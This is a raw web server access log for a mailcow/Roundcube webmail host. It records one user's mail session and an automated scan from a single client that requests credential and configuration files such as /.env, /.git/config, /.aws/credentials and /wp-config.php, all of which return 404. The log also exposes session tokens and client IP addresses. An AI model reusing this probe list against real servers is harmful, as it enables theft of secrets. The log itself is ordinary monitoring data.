"/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13701&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4775] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:11:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13700&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:12:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:13:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:14:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:15:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:16:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:16:54 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 91.196.152.150] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:00:17:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:18:33 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:19:34 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:20:35 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:13 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:31:16 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=Q53wy8xoXcJdO7D9nEABPCLmeMS9PMYK" [Client 222.117.41.51] [Length 11602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771115476695" [Client 222.117.41.51] [Length 360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771115476750&_=1771115476694" [Client 222.117.41.51] [Length 3562] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 11602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:31:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771115481054" [Client 222.117.41.51] [Length 360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:31:21 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771115481079&_=1771115481053" [Client 222.117.41.51] [Length 3562] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:00:55:14 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 147.93.155.10] [Length 10723] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 13; Pixel 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.107 Mobile Safari/537.36" "-" -[15/Feb/2026:03:21:59 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 111.218.1.235] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:22:02 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 128.90.30.234] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 YaBrowser/25.12.3.655.10 YaApp_iOS/2512.3 YaApp_iOS_Browser/2512.3 Safari/604.1 SA/3 Version/18.0" "-" -[15/Feb/2026:03:22:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 111.218.1.235] [Length 10697] [Gzip -] [Sent-to 192.168.0.250] "req/v3 (https://github.com/imroc/req)" "-" -[15/Feb/2026:03:22:08 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 128.90.30.234] [Length 10700] [Gzip -] [Sent-to 192.168.0.250] "req/v3 (https://github.com/imroc/req)" "-" -[15/Feb/2026:03:27:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 111.218.1.235] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:27:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 111.218.1.235] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:27:35 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 128.90.30.234] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 YaBrowser/25.12.3.655.10 YaApp_iOS/2512.3 YaApp_iOS_Browser/2512.3 Safari/604.1 SA/3 Version/18.0" "-" -[15/Feb/2026:03:27:36 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 128.90.30.234] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 YaBrowser/25.12.3.655.10 YaApp_iOS/2512.3 YaApp_iOS_Browser/2512.3 Safari/604.1 SA/3 Version/18.0" "-" -[15/Feb/2026:03:28:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/favicon.ico" [Client 111.218.1.235] [Length 167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 10724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:47 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:48 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 195.178.110.132] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/%22/cache/97de29030b01af5b720989e26703fcf354efbcf2.js%22" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:50 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:50 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:50 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:50 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:51 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:51 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:51 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:51 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:51 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:52 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:52 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:52 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:34:52 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:53 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:34:53 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:42:44 +0000] - 200 200 - HEAD https mail.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" -[15/Feb/2026:03:42:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 211.234.204.1] [Length 2544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:43:02 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:03:43:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=W5zbOGFxJzF4WaqXSTaXrMVaD4iklti4" [Client 211.234.204.1] [Length 11599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:03:43:03 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771126982401" [Client 211.234.204.1] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:03:43:03 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771126982443&_=1771126982400" [Client 211.234.204.1] [Length 3617] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:03:43:04 +0000] - - 499 - GET https mail.hanmocnn.co.kr "/rc/" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:04:23:36 +0000] - - 499 - GET https mail.hanmocnn.co.kr "/" [Client 54.162.53.4] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 222.117.41.51] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css" [Client 222.117.41.51] [Length 52850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/themes/mailcow-darkmode.css" [Client 222.117.41.51] [Length 2118] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/flags/4x3/kr.svg" [Client 222.117.41.51] [Length 761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 222.117.41.51] [Length 261956] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/bootstrap-icons.woff2?524846017b983fc8ded9325d94ed40f3" [Client 222.117.41.51] [Length 102536] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700.woff2" [Client 222.117.41.51] [Length 155152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-italic.woff2" [Client 222.117.41.51] [Length 119256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-regular.woff2" [Client 222.117.41.51] [Length 156884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700italic.woff2" [Client 222.117.41.51] [Length 125244] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 222.117.41.51] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/plugins/jqueryui/themes/elastic/jquery-ui.min.css?s=1748763912" [Client 222.117.41.51] [Length 7377] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 